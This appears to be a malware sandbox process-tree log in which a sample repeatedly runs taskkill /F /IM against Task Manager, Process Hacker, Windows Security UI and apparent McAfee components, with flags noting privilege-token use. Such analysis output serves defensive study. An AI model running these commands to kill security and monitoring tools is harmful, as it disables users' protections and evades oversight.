- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  - Kills process with taskkill
  PID:2336
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:1880
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:1888
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4088
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:4160
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:4752
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  - Kills process with taskkill
  PID:2612
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:1416
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:3244
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:548
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4944
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4732
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3468
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:2384
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:2232
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:3356
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:3252
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:1864
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:4456
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:744
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2336
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:3420
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4796
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4508
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:3492
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:2540
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:2028
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:3168
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:988
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:2756
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4444
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:4948
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:2944
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:1616
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:4912
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:372
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:2296
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4808
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4692
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  - Kills process with taskkill
  PID:2856
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4144
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:1812
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:1168
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:4660
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  - Kills process with taskkill
  PID:4696
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:800
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:412
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:3352
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4636
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:624
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:2028
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:2448
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4912
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  - Kills process with taskkill
  PID:5176
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5264
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5316
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5356
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5420
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5472
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5528
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5576
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5628
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5716
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5788
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  - Kills process with taskkill
  PID:5848
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5908
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:6076
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:6088
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:6128
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:464
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5144
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:4424
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:3420
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:3384
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:4256
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:1112
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5384
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5404
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5456
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:2448
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4688
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  - Kills process with taskkill
  PID:5268
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5244
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5432
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5604
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5444
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5836
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5996
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5684
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:6016
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5940
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5988
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:6080
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:3168
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5312
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:6124
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:1604
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:4856
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  - Kills process with taskkill
  PID:1996
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:3560
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5856
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:2944
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:880
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:3384
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5672
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5332
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:6096
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5556
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5568
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5320
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5984
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5692
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:1148
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:6048
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  - Kills process with taskkill
  PID:5992
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5852
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5704
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:1156
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1632
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4424
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5488
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:3964
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5676
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:4112
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5288
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5428
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5180
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:372
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:2484
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5668
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5384
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:516
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5244
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5116
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:6116
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5528
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:1812
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5692
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5868
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5816
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5780
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:4132
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:3544
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5412
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4256
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:8
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:1604
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:6112
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:3776
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:2156
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:2844
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5696
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:960
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:4912
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  - Kills process with taskkill
  PID:5896
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4480
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:6012
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:1156
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5604
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5704
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5380
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5528
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:2044
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:1444
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5188
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5816
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:2040
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:448
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:3244
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5596
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5932
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5428
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5856
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4456
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:2944
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:728
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:6092
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5304
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:960
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:6124
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  - Kills process with taskkill
  PID:4384
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:2640
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:2044
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5776
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:1416
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:3876
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:3544
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5488
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5572
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:4112
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:988
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:2284
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5016
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5216
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5772
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4868
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:3264
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:3420
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4412
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5924
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:6012
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:2484
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5336
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:2092
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:4424
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5288
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:2064
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5508
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:1512
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5964
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5112
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:1852
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5788
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4804
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:3492
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5820
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  - Kills process with taskkill
  PID:4688
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:6008
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:2156
